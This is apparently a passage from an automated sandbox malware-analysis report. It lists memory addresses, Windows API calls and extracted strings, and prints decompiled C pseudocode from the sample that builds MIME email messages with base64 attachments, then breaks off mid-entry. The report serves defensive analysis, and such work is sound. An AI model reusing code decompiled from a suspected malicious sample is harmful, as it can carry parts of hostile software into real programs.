                                                                                                                                                                                                                            0x00406134
                                                                                                                                                                                                                            0x0040613a
                                                                                                                                                                                                                            0x0040613b
                                                                                                                                                                                                                            0x0040614b
                                                                                                                                                                                                                            0x0040614d
                                                                                                                                                                                                                            0x0040615d
                                                                                                                                                                                                                            0x00406164
                                                                                                                                                                                                                            0x0040616e
                                                                                                                                                                                                                            0x0040616f
                                                                                                                                                                                                                            0x00406174
                                                                                                                                                                                                                            0x0040617a
                                                                                                                                                                                                                            0x0040617b
                                                                                                                                                                                                                            0x00406181
                                                                                                                                                                                                                            0x00406183
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406183
                                                                                                                                                                                                                            0x0040614b
                                                                                                                                                                                                                            0x0040612c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004060fd
                                                                                                                                                                                                                            0x00406191
                                                                                                                                                                                                                            0x00406198
                                                                                                                                                                                                                            0x0040619c
                                                                                                                                                                                                                            0x0040619d
                                                                                                                                                                                                                            0x0040619d
                                                                                                                                                                                                                            0x004060b8
                                                                                                                                                                                                                            0x004060a5
                                                                                                                                                                                                                            0x0040608f
                                                                                                                                                                                                                            0x00406040
                                                                                                                                                                                                                            0x0040604b
                                                                                                                                                                                                                            0x0040604f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406051
                                                                                                                                                                                                                            0x00406051
                                                                                                                                                                                                                            0x0040605c
                                                                                                                                                                                                                            0x00406060
                                                                                                                                                                                                                            0x00406065
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406067
                                                                                                                                                                                                                            0x0040606a
                                                                                                                                                                                                                            0x00406071
                                                                                                                                                                                                                            0x00406075
                                                                                                                                                                                                                            0x00406076
                                                                                                                                                                                                                            0x00406076
                                                                                                                                                                                                                            0x00406065
                                                                                                                                                                                                                            0x0040604f
                                                                                                                                                                                                                            0x004061a2
                                                                                                                                                                                                                            0x004061ab

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00406035
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00406046
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,?,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00406076
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004060DA
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001), ref: 0040610F
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5), ref: 00406122
                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000), ref: 0040612F
                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278), ref: 0040613B
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040616F
                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040617B
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040619D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 3245196872-1565342463
                                                                                                                                                                                                                            • Opcode ID: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                                                                                                                                                                                            • Instruction ID: 0b7a158813eaac7eeaad4be5227783dc720e21281ab2719b2f6a7295f4a4c489
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B341A272900158AFEB10DBA9CC85BDEB3EDDF44304F1501B7E94AF7282D6389E548B58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0048C7F4 Relevance: 24.3, Strings: 19, Instructions: 507COMMONCrypto
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E0048C7F4(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v9;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v29;
				char _v36;
				char _v37;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				void* _v88;
				char _v92;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				void* _v120;
				char _v124;
				void* _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				intOrPtr _v156;
				char _v160;
				intOrPtr _v164;
				intOrPtr _t255;
				intOrPtr _t256;
				char _t269;
				char _t270;
				char _t302;
				char _t305;
				void* _t308;
				char _t309;
				intOrPtr _t312;
				void* _t319;
				void* _t331;
				void* _t338;
				intOrPtr _t343;
				void* _t433;
				void* _t439;
				intOrPtr _t443;
				void* _t450;
				void* _t475;
				intOrPtr _t537;
				intOrPtr _t554;
				intOrPtr _t559;
				intOrPtr _t565;
				intOrPtr _t572;
				intOrPtr _t610;
				intOrPtr _t615;
				intOrPtr _t626;
				intOrPtr _t627;
				void* _t644;

				_t624 = __esi;
				_t623 = __edi;
				_t626 = _t627;
				_t475 = 0x14;
				do {
					_push(0);
					_push(0);
					_t475 = _t475 - 1;
				} while (_t475 != 0);
				_v16 = __edx;
				_v8 = __eax;
				 *[fs:eax] = _t627;
				_v29 =  *((char*)(_v16 + 0x60)) == 0;
				E004049C0( &_v24);
				E004872DC( &_v9,  &_v36,  &_v37);
				_t470 =  *_v8;
				 *((intOrPtr*)( *_v8 + 0x30))( *[fs:eax], 0x48cf08, _t626, __ebx);
				_push(_t626);
				_push(0x48cecb);
				_push( *[fs:edx]);
				 *[fs:edx] = _t627;
				_t255 =  *((intOrPtr*)(_v16 + 0x6c));
				if( *((intOrPtr*)(_t255 + 0x20)) <= 0) {
					__eflags =  *((intOrPtr*)(_t255 + 0x2c)) - 1;
					if( *((intOrPtr*)(_t255 + 0x2c)) <= 1) {
						_t256 =  *0x49db94; // 0x47a624
						E00406A70(_t256,  &_v136);
						_v56 = _v136;
						_v52 = 0xb;
						E0047F338(_v8, _t470,  &_v56, 5, __edi, __esi, 0);
						__eflags = _v9 - 2;
						if(_v9 != 2) {
							 *((intOrPtr*)( *_v8 + 0xac))();
						} else {
							_t269 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x34)))) + 0x14))() - 1;
							__eflags = _t269;
							if(_t269 >= 0) {
								_t270 = _t269 + 1;
								__eflags = _t270;
								_v44 = _t270;
								_v20 = 0;
								do {
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x34)))) + 0xc))();
									E00404EE0(_v144, 1, 1,  &_v140);
									E00404DCC(_v140, 0x48d22c);
									if(__eflags != 0) {
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x34)))) + 0xc))();
										E0048746C(_v164,  *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x34)))),  &_v160, _t623, _t624);
										 *((intOrPtr*)( *_v8 + 0x7c))();
									} else {
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x34)))) + 0xc))();
										E0048746C(_v156,  *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x34)))),  &_v152, _t623, _t624);
										E00404CCC( &_v148, _v152, 0x48d22c);
										 *((intOrPtr*)( *_v8 + 0x7c))();
									}
									_v20 = _v20 + 1;
									_t238 =  &_v44;
									 *_t238 = _v44 - 1;
									__eflags =  *_t238;
								} while ( *_t238 != 0);
							}
						}
					} else {
						 *((intOrPtr*)( *_v8 + 0x7c))();
						 *((intOrPtr*)( *_v8 + 0x7c))();
						_t302 = E0041B9E8( *((intOrPtr*)(_v16 + 0x6c))) - 1;
						__eflags = _t302;
						if(_t302 >= 0) {
							_t305 = _t302 + 1;
							__eflags = _t305;
							_v44 = _t305;
							_v20 = 0;
							do {
								_t308 = E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20);
								_t554 =  *0x48d78c; // 0x48d7d8
								_t309 = E00403D78(_t308, _t554);
								__eflags = _t309;
								if(_t309 != 0) {
									 *((intOrPtr*)( *_v8 + 0x7c))();
									_t312 =  *0x49db94; // 0x47a624
									E00406A70(_t312,  &_v132);
									_v56 = _v132;
									_v52 = 0xb;
									E0047F338(_v8, _t470,  &_v56, 5, _t623, _t624, 0);
									_t319 = E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20);
									_t559 =  *0x48d78c; // 0x48d7d8
									E0048C554(E00403D9C(_t319, _t559), _t470, _t623, _t624, _t626);
								}
								_v20 = _v20 + 1;
								_t190 =  &_v44;
								 *_t190 = _v44 - 1;
								__eflags =  *_t190;
							} while ( *_t190 != 0);
						}
						 *((intOrPtr*)( *_v8 + 0x7c))();
					}
					goto L50;
				} else {
					if(_v29 == 0) {
						 *((intOrPtr*)( *_v8 + 0xac))();
						__eflags = 0;
						 *((intOrPtr*)( *_v8 + 0x7c))();
					} else {
						 *((intOrPtr*)( *_v8 + 0x7c))();
						 *((intOrPtr*)( *_v8 + 0x7c))();
						if( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x6c)) + 0x28)) <= 0) {
							E00404A58( &_v24, "=_NextPart_2rfkindysadvnqw3nerasdf");
						} else {
							E00404A58( &_v24, "=_NextPart_2relrfksadvnqindyw3nerasdf");
						}
						E00404CCC( &_v48, _v24, 0x48cfac);
						 *((intOrPtr*)( *_v8 + 0x7c))();
					}
					if( *((intOrPtr*)( *((intOrPtr*)(_v16 + 0x6c)) + 0x2c)) <= 1) {
						__eflags = _v29;
						if(_v29 != 0) {
							 *((intOrPtr*)( *_v8 + 0x7c))();
							 *((intOrPtr*)( *_v8 + 0x7c))();
							__eflags = 0;
							 *((intOrPtr*)( *_v8 + 0x7c))();
							 *((intOrPtr*)( *_v8 + 0xac))();
						}
					} else {
						 *((intOrPtr*)( *_v8 + 0x7c))();
						 *((intOrPtr*)( *_v8 + 0x7c))();
						 *((intOrPtr*)( *_v8 + 0x7c))();
						_t433 = E0041B9E8( *((intOrPtr*)(_v16 + 0x6c))) - 1;
						if(_t433 >= 0) {
							_v44 = _t433 + 1;
							_v20 = 0;
							do {
								_t439 = E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20);
								_t610 =  *0x48d78c; // 0x48d7d8
								if(E00403D78(_t439, _t610) != 0) {
									 *((intOrPtr*)( *_v8 + 0x7c))();
									_t443 =  *0x49db94; // 0x47a624
									E00406A70(_t443,  &_v60);
									_v56 = _v60;
									_v52 = 0xb;
									E0047F338(_v8, _t470,  &_v56, 5, _t623, _t624, 0);
									_t450 = E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20);
									_t615 =  *0x48d78c; // 0x48d7d8
									E0048C554(E00403D9C(_t450, _t615), _t470, _t623, _t624, _t626);
									 *((intOrPtr*)( *_v8 + 0x7c))();
								}
								_v20 = _v20 + 1;
								_t66 =  &_v44;
								 *_t66 = _v44 - 1;
							} while ( *_t66 != 0);
						}
						 *((intOrPtr*)( *_v8 + 0x7c))();
					}
					_t331 = E0041B9E8( *((intOrPtr*)(_v16 + 0x6c))) - 1;
					if(_t331 < 0) {
						L32:
						__eflags = _v29;
						if(_v29 != 0) {
							E00404D40();
							 *((intOrPtr*)( *_v8 + 0x7c))(0x48cfac, _v24, 0x48cfac);
						}
						L50:
						__eflags = 0;
						_pop(_t537);
						 *[fs:eax] = _t537;
						return  *((intOrPtr*)( *_v8 + 0x38))(0x48ced2);
					} else {
						_v44 = _t331 + 1;
						_v20 = 0;
						while(1) {
							_t338 = E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20);
							_t565 =  *0x48d6cc; // 0x48d718
							if(E00403D78(_t338, _t565) != 0) {
								break;
							}
							_v20 = _v20 + 1;
							_t157 =  &_v44;
							 *_t157 = _v44 - 1;
							__eflags =  *_t157;
							if( *_t157 != 0) {
								continue;
							} else {
								goto L32;
							}
							goto L51;
						}
						_t474 = E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20);
						_t343 =  *0x49d860; // 0x47a62c
						E00406A70(_t343,  &_v64);
						_v56 = _v64;
						_v52 = 0xb;
						E0047F338(_v8, _t342,  &_v56, 5, _t623, _t624, 0);
						if(_v29 != 0) {
							 *((intOrPtr*)( *_v8 + 0x7c))();
							E00404CCC( &_v68, _v24, 0x48cfac);
							 *((intOrPtr*)( *_v8 + 0x7c))();
							E0048E324(_t474,  &_v72);
							if(E00404C80(_v72) == 0) {
								E0048E390(_t474, "base64");
							}
							E0048E5E8(_t474,  &_v76);
							_t644 = E00404C80(_v76);
							if(_t644 == 0) {
								E0048E61C(_t474, "attachment");
							}
							E0048E324(_t474,  &_v80);
							E00404DCC(_v80, "base64");
							if(_t644 == 0) {
								E0048E360(_t474,  &_v84);
								if(E00404C80(_v84) == 0) {
									E0048E3C4(_t474, "application/octet-stream");
								}
							}
							E0048E360(_t474,  &_v92);
							E00404D40();
							 *((intOrPtr*)( *_v8 + 0x7c))(0x48d13c, _v92, "Content-Type: ");
							E00409E18( *((intOrPtr*)(_t474 + 0x48)),  &_v100);
							E00404D40();
							 *((intOrPtr*)( *_v8 + 0x7c))(0x48d160, _v100, "        name=\"");
							E0048E324(_t474,  &_v108);
							E00404CCC( &_v104, _v108, "Content-Transfer-Encoding: ");
							 *((intOrPtr*)( *_v8 + 0x7c))();
							E0048E5E8(_t474,  &_v116);
							E00404D40();
							 *((intOrPtr*)( *_v8 + 0x7c))(0x48d13c, _v116, "Content-Disposition: ");
							E00409E18( *((intOrPtr*)(_t474 + 0x48)),  &_v124);
							E00404D40();
							 *((intOrPtr*)( *_v8 + 0x7c))(0x48d160, _v124, "        filename=\"");
							E00483B3C(_v8, _t474, 0,  *((intOrPtr*)(_t474 + 0x24)), _t623, _t624);
							 *((intOrPtr*)( *_v8 + 0x7c))();
						}
						_v28 = E00481384(_v8, 1);
						_push(_t626);
						_push(0x48cc67);
						_push( *[fs:eax]);
						 *[fs:eax] = _t627;
						E0048E580(E0048E8AC( *((intOrPtr*)(_v16 + 0x6c)), _v20), _t474, _v28, _t623, _t624, 0);
						_pop(_t572);
						 *[fs:eax] = _t572;
						_push(0x48cc6e);
						return E0040ECF8( &_v28);
					}
				}
				L51:
			}







































































                                                                                                                                                                                                                            0x0048c7f4
                                                                                                                                                                                                                            0x0048c7f4
                                                                                                                                                                                                                            0x0048c7f5
                                                                                                                                                                                                                            0x0048c7f7
                                                                                                                                                                                                                            0x0048c7fc
                                                                                                                                                                                                                            0x0048c7fc
                                                                                                                                                                                                                            0x0048c7fe
                                                                                                                                                                                                                            0x0048c800
                                                                                                                                                                                                                            0x0048c800
                                                                                                                                                                                                                            0x0048c804
                                                                                                                                                                                                                            0x0048c807
                                                                                                                                                                                                                            0x0048c815
                                                                                                                                                                                                                            0x0048c81f
                                                                                                                                                                                                                            0x0048c826
                                                                                                                                                                                                                            0x0048c834
                                                                                                                                                                                                                            0x0048c840
                                                                                                                                                                                                                            0x0048c842
                                                                                                                                                                                                                            0x0048c847
                                                                                                                                                                                                                            0x0048c848
                                                                                                                                                                                                                            0x0048c84d
                                                                                                                                                                                                                            0x0048c850
                                                                                                                                                                                                                            0x0048c856
                                                                                                                                                                                                                            0x0048c85d
                                                                                                                                                                                                                            0x0048ccb8
                                                                                                                                                                                                                            0x0048ccbc
                                                                                                                                                                                                                            0x0048cd8a
                                                                                                                                                                                                                            0x0048cd8f
                                                                                                                                                                                                                            0x0048cd9a
                                                                                                                                                                                                                            0x0048cd9d
                                                                                                                                                                                                                            0x0048cda9
                                                                                                                                                                                                                            0x0048cdae
                                                                                                                                                                                                                            0x0048cdb2
                                                                                                                                                                                                                            0x0048cead
                                                                                                                                                                                                                            0x0048cdb8
                                                                                                                                                                                                                            0x0048cdc3
                                                                                                                                                                                                                            0x0048cdc4
                                                                                                                                                                                                                            0x0048cdc6
                                                                                                                                                                                                                            0x0048cdcc
                                                                                                                                                                                                                            0x0048cdcc
                                                                                                                                                                                                                            0x0048cdcd
                                                                                                                                                                                                                            0x0048cdd0
                                                                                                                                                                                                                            0x0048cdd7
                                                                                                                                                                                                                            0x0048cdef
                                                                                                                                                                                                                            0x0048ce02
                                                                                                                                                                                                                            0x0048ce12
                                                                                                                                                                                                                            0x0048ce17
                                                                                                                                                                                                                            0x0048ce75
                                                                                                                                                                                                                            0x0048ce84
                                                                                                                                                                                                                            0x0048ce94
                                                                                                                                                                                                                            0x0048ce19
                                                                                                                                                                                                                            0x0048ce2a
                                                                                                                                                                                                                            0x0048ce39
                                                                                                                                                                                                                            0x0048ce4f
                                                                                                                                                                                                                            0x0048ce5f
                                                                                                                                                                                                                            0x0048ce5f
                                                                                                                                                                                                                            0x0048ce97
                                                                                                                                                                                                                            0x0048ce9a
                                                                                                                                                                                                                            0x0048ce9a
                                                                                                                                                                                                                            0x0048ce9a
                                                                                                                                                                                                                            0x0048ce9a
                                                                                                                                                                                                                            0x0048cea3
                                                                                                                                                                                                                            0x0048cdc6
                                                                                                                                                                                                                            0x0048ccc2
                                                                                                                                                                                                                            0x0048cccc
                                                                                                                                                                                                                            0x0048ccd6
                                                                                                                                                                                                                            0x0048cce4
                                                                                                                                                                                                                            0x0048cce5
                                                                                                                                                                                                                            0x0048cce7
                                                                                                                                                                                                                            0x0048cced
                                                                                                                                                                                                                            0x0048cced
                                                                                                                                                                                                                            0x0048ccee
                                                                                                                                                                                                                            0x0048ccf1
                                                                                                                                                                                                                            0x0048ccf8
                                                                                                                                                                                                                            0x0048cd01
                                                                                                                                                                                                                            0x0048cd06
                                                                                                                                                                                                                            0x0048cd0c
                                                                                                                                                                                                                            0x0048cd11
                                                                                                                                                                                                                            0x0048cd13
                                                                                                                                                                                                                            0x0048cd1f
                                                                                                                                                                                                                            0x0048cd27
                                                                                                                                                                                                                            0x0048cd2c
                                                                                                                                                                                                                            0x0048cd34
                                                                                                                                                                                                                            0x0048cd37
                                                                                                                                                                                                                            0x0048cd43
                                                                                                                                                                                                                            0x0048cd52
                                                                                                                                                                                                                            0x0048cd57
                                                                                                                                                                                                                            0x0048cd62
                                                                                                                                                                                                                            0x0048cd67
                                                                                                                                                                                                                            0x0048cd68
                                                                                                                                                                                                                            0x0048cd6b
                                                                                                                                                                                                                            0x0048cd6b
                                                                                                                                                                                                                            0x0048cd6b
                                                                                                                                                                                                                            0x0048cd6b
                                                                                                                                                                                                                            0x0048ccf8
                                                                                                                                                                                                                            0x0048cd7a
                                                                                                                                                                                                                            0x0048cd7a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0048c863
                                                                                                                                                                                                                            0x0048c867
                                                                                                                                                                                                                            0x0048c8cd
                                                                                                                                                                                                                            0x0048c8d3
                                                                                                                                                                                                                            0x0048c8da
                                                                                                                                                                                                                            0x0048c869
                                                                                                                                                                                                                            0x0048c873
                                                                                                                                                                                                                            0x0048c87d
                                                                                                                                                                                                                            0x0048c88a
                                                                                                                                                                                                                            0x0048c8a3
                                                                                                                                                                                                                            0x0048c88c
                                                                                                                                                                                                                            0x0048c894
                                                                                                                                                                                                                            0x0048c894
                                                                                                                                                                                                                            0x0048c8b3
                                                                                                                                                                                                                            0x0048c8c0
                                                                                                                                                                                                                            0x0048c8c0
                                                                                                                                                                                                                            0x0048c8e7
                                                                                                                                                                                                                            0x0048c9c5
                                                                                                                                                                                                                            0x0048c9c9
                                                                                                                                                                                                                            0x0048c9d5
                                                                                                                                                                                                                            0x0048c9e2
                                                                                                                                                                                                                            0x0048c9e5
                                                                                                                                                                                                                            0x0048c9ec
                                                                                                                                                                                                                            0x0048c9f7
                                                                                                                                                                                                                            0x0048c9f7
                                                                                                                                                                                                                            0x0048c8ed
                                                                                                                                                                                                                            0x0048c8f7
                                                                                                                                                                                                                            0x0048c904
                                                                                                                                                                                                                            0x0048c90e
                                                                                                                                                                                                                            0x0048c91c
                                                                                                                                                                                                                            0x0048c91f
                                                                                                                                                                                                                            0x0048c926
                                                                                                                                                                                                                            0x0048c929
                                                                                                                                                                                                                            0x0048c930
                                                                                                                                                                                                                            0x0048c939
                                                                                                                                                                                                                            0x0048c93e
                                                                                                                                                                                                                            0x0048c94b
                                                                                                                                                                                                                            0x0048c957
                                                                                                                                                                                                                            0x0048c95f
                                                                                                                                                                                                                            0x0048c964
                                                                                                                                                                                                                            0x0048c96c
                                                                                                                                                                                                                            0x0048c96f
                                                                                                                                                                                                                            0x0048c97b
                                                                                                                                                                                                                            0x0048c98a
                                                                                                                                                                                                                            0x0048c98f
                                                                                                                                                                                                                            0x0048c99a
                                                                                                                                                                                                                            0x0048c9a7
                                                                                                                                                                                                                            0x0048c9a7
                                                                                                                                                                                                                            0x0048c9aa
                                                                                                                                                                                                                            0x0048c9ad
                                                                                                                                                                                                                            0x0048c9ad
                                                                                                                                                                                                                            0x0048c9ad
                                                                                                                                                                                                                            0x0048c930
                                                                                                                                                                                                                            0x0048c9c0
                                                                                                                                                                                                                            0x0048c9c0
                                                                                                                                                                                                                            0x0048ca08
                                                                                                                                                                                                                            0x0048ca0b
                                                                                                                                                                                                                            0x0048cc84
                                                                                                                                                                                                                            0x0048cc84
                                                                                                                                                                                                                            0x0048cc88
                                                                                                                                                                                                                            0x0048cca3
                                                                                                                                                                                                                            0x0048ccb0
                                                                                                                                                                                                                            0x0048ccb0
                                                                                                                                                                                                                            0x0048ceb3
                                                                                                                                                                                                                            0x0048ceb3
                                                                                                                                                                                                                            0x0048ceb5
                                                                                                                                                                                                                            0x0048ceb8
                                                                                                                                                                                                                            0x0048ceca
                                                                                                                                                                                                                            0x0048ca11
                                                                                                                                                                                                                            0x0048ca12
                                                                                                                                                                                                                            0x0048ca15
                                                                                                                                                                                                                            0x0048ca1c
                                                                                                                                                                                                                            0x0048ca25
                                                                                                                                                                                                                            0x0048ca2a
                                                                                                                                                                                                                            0x0048ca37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0048cc78
                                                                                                                                                                                                                            0x0048cc7b
                                                                                                                                                                                                                            0x0048cc7b
                                                                                                                                                                                                                            0x0048cc7b
                                                                                                                                                                                                                            0x0048cc7e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0048cc7e
                                                                                                                                                                                                                            0x0048ca4b
                                                                                                                                                                                                                            0x0048ca52
                                                                                                                                                                                                                            0x0048ca57
                                                                                                                                                                                                                            0x0048ca5f
                                                                                                                                                                                                                            0x0048ca62
                                                                                                                                                                                                                            0x0048ca6e
                                                                                                                                                                                                                            0x0048ca77
                                                                                                                                                                                                                            0x0048ca84
                                                                                                                                                                                                                            0x0048ca92
                                                                                                                                                                                                                            0x0048ca9f
                                                                                                                                                                                                                            0x0048caa7
                                                                                                                                                                                                                            0x0048cab6
                                                                                                                                                                                                                            0x0048cabf
                                                                                                                                                                                                                            0x0048cabf
                                                                                                                                                                                                                            0x0048cac9
                                                                                                                                                                                                                            0x0048cad6
                                                                                                                                                                                                                            0x0048cad8
                                                                                                                                                                                                                            0x0048cae1
                                                                                                                                                                                                                            0x0048cae1
                                                                                                                                                                                                                            0x0048caeb
                                                                                                                                                                                                                            0x0048caf8
                                                                                                                                                                                                                            0x0048cafd
                                                                                                                                                                                                                            0x0048cb04
                                                                                                                                                                                                                            0x0048cb13
                                                                                                                                                                                                                            0x0048cb1c
                                                                                                                                                                                                                            0x0048cb1c
                                                                                                                                                                                                                            0x0048cb13
                                                                                                                                                                                                                            0x0048cb2b
                                                                                                                                                                                                                            0x0048cb40
                                                                                                                                                                                                                            0x0048cb4d
                                                                                                                                                                                                                            0x0048cb5b
                                                                                                                                                                                                                            0x0048cb70
                                                                                                                                                                                                                            0x0048cb7d
                                                                                                                                                                                                                            0x0048cb85
                                                                                                                                                                                                                            0x0048cb95
                                                                                                                                                                                                                            0x0048cba2
                                                                                                                                                                                                                            0x0048cbaf
                                                                                                                                                                                                                            0x0048cbc4
                                                                                                                                                                                                                            0x0048cbd1
                                                                                                                                                                                                                            0x0048cbdf
                                                                                                                                                                                                                            0x0048cbf4
                                                                                                                                                                                                                            0x0048cc01
                                                                                                                                                                                                                            0x0048cc0c
                                                                                                                                                                                                                            0x0048cc18
                                                                                                                                                                                                                            0x0048cc18
                                                                                                                                                                                                                            0x0048cc2a
                                                                                                                                                                                                                            0x0048cc2f
                                                                                                                                                                                                                            0x0048cc30
                                                                                                                                                                                                                            0x0048cc35
                                                                                                                                                                                                                            0x0048cc38
                                                                                                                                                                                                                            0x0048cc4c
                                                                                                                                                                                                                            0x0048cc53
                                                                                                                                                                                                                            0x0048cc56
                                                                                                                                                                                                                            0x0048cc59
                                                                                                                                                                                                                            0x0048cc66
                                                                                                                                                                                                                            0x0048cc66
                                                                                                                                                                                                                            0x0048ca0b
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • application/octet-stream, xrefs: 0048CB15
                                                                                                                                                                                                                            • name=", xrefs: 0048CB50
                                                                                                                                                                                                                            • This is a multi-part message in MIME format, xrefs: 0048C869, 0048CCC2
                                                                                                                                                                                                                            • --=_NextPart_2altrfkindysadvnqw3nerasdf--, xrefs: 0048C9B6
                                                                                                                                                                                                                            • Content-Disposition: , xrefs: 0048CBA5
                                                                                                                                                                                                                            • Content-Type: text/plain, xrefs: 0048C9CB
                                                                                                                                                                                                                            • --=_NextPart_2rfkindysadvnqw3nerasdf--, xrefs: 0048CD70
                                                                                                                                                                                                                            • Content-Type: multipart/alternative; , xrefs: 0048C8ED
                                                                                                                                                                                                                            • --=_NextPart_2altrfkindysadvnqw3nerasdf, xrefs: 0048C94D
                                                                                                                                                                                                                            • =_NextPart_2rfkindysadvnqw3nerasdf, xrefs: 0048C89E
                                                                                                                                                                                                                            • boundary="=_NextPart_2altrfkindysadvnqw3nerasdf", xrefs: 0048C8FA
                                                                                                                                                                                                                            • Content-Transfer-Encoding: 7bit, xrefs: 0048C9D8
                                                                                                                                                                                                                            • attachment, xrefs: 0048CADA
                                                                                                                                                                                                                            • base64, xrefs: 0048CAB8, 0048CAF3
                                                                                                                                                                                                                            • filename=", xrefs: 0048CBD4
                                                                                                                                                                                                                            • --=_NextPart_2rfkindysadvnqw3nerasdf, xrefs: 0048CD15
                                                                                                                                                                                                                            • Content-Transfer-Encoding: , xrefs: 0048CB90
                                                                                                                                                                                                                            • Content-Type: , xrefs: 0048CB21
                                                                                                                                                                                                                            • =_NextPart_2relrfksadvnqindyw3nerasdf, xrefs: 0048C88F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
